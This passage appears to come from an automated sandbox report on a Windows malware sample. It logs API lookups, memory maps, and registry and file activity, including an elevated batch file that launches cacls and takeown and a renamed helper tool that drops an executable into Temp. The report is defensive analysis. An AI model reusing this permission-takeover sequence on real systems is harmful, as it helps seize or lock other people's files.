| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:01 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #207: cmd.exe
237
0
| Information | Value |
|---|---|
| ID | #207 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\dir.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4b0 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
728
0x
DF0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x04b5ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b60000 | 0x04b60000 | 0x04b6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04b73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04b81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04b83fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x04ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cf0000 | 0x04cf0000 | 0x04cf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d00000 | 0x04d00000 | 0x04d00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d90000 | 0x04e4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x050d0000 | 0x05406fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec80000 | 0x7ec80000 | 0x7ed7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7eda2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eda7000 | 0x7eda7000 | 0x7eda9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edaa000 | 0x7edaa000 | 0x7edaafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edab000 | 0x7edab000 | 0x7edadfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edae000 | 0x7edae000 | 0x7edaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (165)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
22 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
76 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x440, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xfcc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "dir.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "dir.exe" |
|
1 |
Process #209: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #209 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:28, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd98 |
| Parent PID | 0xa84 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
34C
0x
C7C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00927fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x01ebffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
